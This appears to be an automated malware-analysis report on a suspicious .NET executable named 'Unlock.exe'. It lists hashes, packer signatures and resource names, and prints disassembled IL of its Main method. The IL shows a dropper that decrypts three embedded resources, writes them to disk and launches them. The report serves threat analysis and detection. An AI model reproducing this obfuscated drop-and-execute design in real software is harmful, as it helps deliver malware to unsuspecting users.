Suspicious
Suspect

bca6d652a499554802b0cec68dafca10

PE Executable | MD5: bca6d652a499554802b0cec68dafca10 | Size: 16.87 MB | application/x-dosexec


Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

High

Hash
MD5: bca6d652a499554802b0cec68dafca10
SHA1: fe328627b6a9000c4fe095e9ff26c2e7b85cdf75
SHA256: c82e00a5528e7cae35d7454562ab830a8de45b0b6a1150ec0907ebb0072842da
SHA384: e3dad0b91d4ba24a452a5f0cfce5e462c1cee491dc91b75b24889af5fab4223f2d04fa82855c519ec7da8a9b368c0818
SHA512: 4f8e057f1945be4ac3d96d9195cce82f36a11861c0845de3fc7ee32f6be76c653ab08a465c5588ab1e9f55ce22cd48b68721d925f7202374788af8cd680c3f4f
SSDeep: 393216:pnI6d3a2wi3lsIbEnj2YQcFea83NhtPUAJiOeXoQvH:+Gs9nj2/rR/JiOeXo
TLSH: A7073302B88E06F6A94C7F7544B6AE5B059D2A5F103311237BD8093971AB79CB393B7C

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
UPolyX 0.3 -> delikon
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
kczdjpvzuvvstzec.Resources
awgxdlpquuujgwfr
frrbptrzspvyiaku
pllqulqzniipuktx
Information
Info: PE Detect: PeReader OK (file layout)
Module Name: Unlock.exe
Full Name: Unlock.exe
EntryPoint: System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Scope Name: Unlock.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Unlock
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 20
Main Method: System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::Main()
Main IL Instruction Count: 141

Main IL

ldstr SSf8OnE14MbVEZCw1AX4ZUNSNcnausjih5yuAxwqjjJyD16zBEsPxm3Z7b5GmSudSis4YpWqFrHGs5c2PctwixqTTnWZsmSY707KpUgf9OCvtZilLYCImuV/s2aW+HKAmLg55gyVsyvqeXu8ld4tCXLlWhnl7UjCsO8ylugQKi0Zujgg4Lo7ebClWAMwjiCxakNc0BPlKb10Do/LFnXJbyzDErl+BUJMjPeN5ofkzBXt76DPoBNUiMwS9VVhMv8AQMC56Z/PNllGUEq0LpOPV0LIw01sv9pOKnUmIiOGC6CBFKftpsCmVJT0brUbuhxX/rLDwLSzJ4QVxgcImjabYPyWOeOmuO7y1av95L7eqX+1rk0f6j27ubQiD9Hjt2LPfP5/uIuNjOSXrQG9YO5OTw== call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Void avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::ezuewxw(System.String) ldc.i4.3 <null> newarr System.String[] stloc.s V_4 ldloc.s V_4 ldc.i4.0 <null> ldc.i4.4 <null> newarr System.String stloc.s V_5 ldloc.s V_5 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_5 ldc.i4.1 <null> ldstr Ovalz7NOF+eqaZPk8lPuUA== stelem.ref <null> ldloc.s V_5 ldc.i4.2 <null> ldstr awgxdlpquuujgwfr stelem.ref <null> ldloc.s V_5 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_5 stelem.ref <null> ldloc.s V_4 ldc.i4.1 <null> ldc.i4.4 <null> newarr System.String stloc.s V_6 ldloc.s V_6 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_6 ldc.i4.1 <null> ldstr PL2i738ohSZt28I6pihGZB4hW5ZOG8lYeCHLupHLBKk= stelem.ref <null> ldloc.s V_6 ldc.i4.2 <null> ldstr frrbptrzspvyiaku stelem.ref <null> ldloc.s V_6 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_6 stelem.ref <null> ldloc.s V_4 ldc.i4.2 <null> ldc.i4.4 <null> newarr System.String stloc.s V_7 ldloc.s V_7 ldc.i4.0 <null> ldstr J+8SorPTWBoAlCkuAPHDfw== stelem.ref <null> ldloc.s V_7 ldc.i4.1 <null> ldstr F0kg0nyFuVb7NTbeTXoZu6Kg84pyiDFPGLg0ObmEVfk= stelem.ref <null> ldloc.s V_7 ldc.i4.2 <null> ldstr pllqulqzniipuktx stelem.ref <null> ldloc.s V_7 ldc.i4.3 <null> ldstr DAN8PDaFWpUrLjJpJ5NUNA== stelem.ref <null> ldloc.s V_7 stelem.ref <null> ldloc.s V_4 stloc.0 
<null> ldstr kczdjpvzuvvstzec call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() newobj System.Void System.Resources.ResourceManager::.ctor(System.String,System.Reflection.Assembly) stloc.1 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_013C: ldloc.2 ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> ldstr TQ2t/T+oYKw3ATMu8jVeHzNVaa4uqCDjUINmt8ytSOI= call System.Boolean System.String::op_Equality(System.String,System.String) brtrue.s IL_00E6: call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.0 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.Environment::GetEnvironmentVariable(System.String) br.s IL_00EB: ldloc.0 call System.String System.IO.Directory::GetCurrentDirectory() ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.1 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.3 <null> ldloc.3 <null> ldloc.1 <null> ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.2 <null> ldelem.ref <null> callvirt System.Object System.Resources.ResourceManager::GetObject(System.String) castclass System.Byte[] call System.Byte[] avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::bfzavgfglrykmk(System.Byte[]) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) ldloc.0 <null> ldloc.2 <null> ldelem.ref <null> ldc.i4.3 <null> ldelem.ref <null> call System.String avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) ldstr DAN8PDaFWpUrLjJpJ5NUNA== call System.String 
avwcubjqvgnlvqkyxftituvvgmwcddhcy.avwcubjqvgnlvqkyxftituvvgmwcddhcy::nmkjdxvrychggueryzezrsbzwjqqvuvkvptz(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0138: ldloc.2 ldloc.3 <null> call System.Diagnostics.Process System.Diagnostics.Process::Start(System.String) pop <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> blt.s IL_00C4: ldloc.0 ret <null>
